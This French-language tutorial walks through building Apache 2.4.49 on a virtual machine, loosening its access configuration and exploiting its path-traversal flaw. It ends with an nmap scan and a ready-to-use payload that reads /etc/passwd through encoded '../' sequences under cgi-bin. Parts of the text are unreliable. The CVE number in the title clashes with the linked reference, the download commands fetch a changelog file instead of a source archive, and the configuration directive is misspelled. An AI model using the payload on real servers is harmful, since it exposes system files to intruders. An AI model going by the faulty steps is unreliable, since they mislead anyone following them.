
ceci est un exemple pratique de la façon d'exploiter la vulnérabilité CVE-2021-4773 avec une machine virtuelle
ceci est un exemple pratique de la manière d'exploiter la vulnérabilité CVE-2021-4773 avec une machine virtuelle
pour ce tutoriel, vous avez besoin des éléments suivants
alors commençons quand vous avez 2 machines virtuelles en cours d'exécution, vous allez installer apache version 2.4.49 avec une archive de dépôt vous pouvez trouver cette version ici https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 la première fois sur votre machine virtuelle serveur, vous devez exécuter la commande suivante
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 ou wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 la deuxième fois, vous devez décompresser cette version d'apache comme ceci
tar -xvjf httpd-2.4.49.tar.bz2
3 installer les paquets suivants
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 exécuter le fichier exécutable dans le répertoire principal (nom du fichier configure) en utilisant le flag pour spécifier le répertoire d'installation
./configure --prefix=/usr/local/apache2
5 compiler la version vulnérable
make
6 installer la version vulnérable
make install
7 vérifier la version
ls /usr/local/apache2
8 démarrer le processus
/usr/local/apache2/bin/apachectl start
9 vérifier le processus
ps aux | grep httpd
10 configurer la vulnérabilité trouver le fichier /usr/local/apache2/conf/httpd.conf et configurer le répertoire admin trouver la balise directory et remplacer Require all denied par
Required all granted
trouver la balise Files .ht* et remplacer Require all denied par
Required all granted
le premier changement permet l'exploitation de la vulnérabilité dans l'environnement local et le second l'exposition dans l'environnement réel
1 scanner l'adresse IP avec nmap avec la commande suivante
nmap -sV ip_address
2 faire un curl ou wget pour tester le serveur apache
curl ip_address ou faire wget ip_address
3 voir comment exploiter la vulnérabilité sur la page suivante si vous voulez comprendre la syntaxe
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
ou utilisez simplement la payload suivante
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd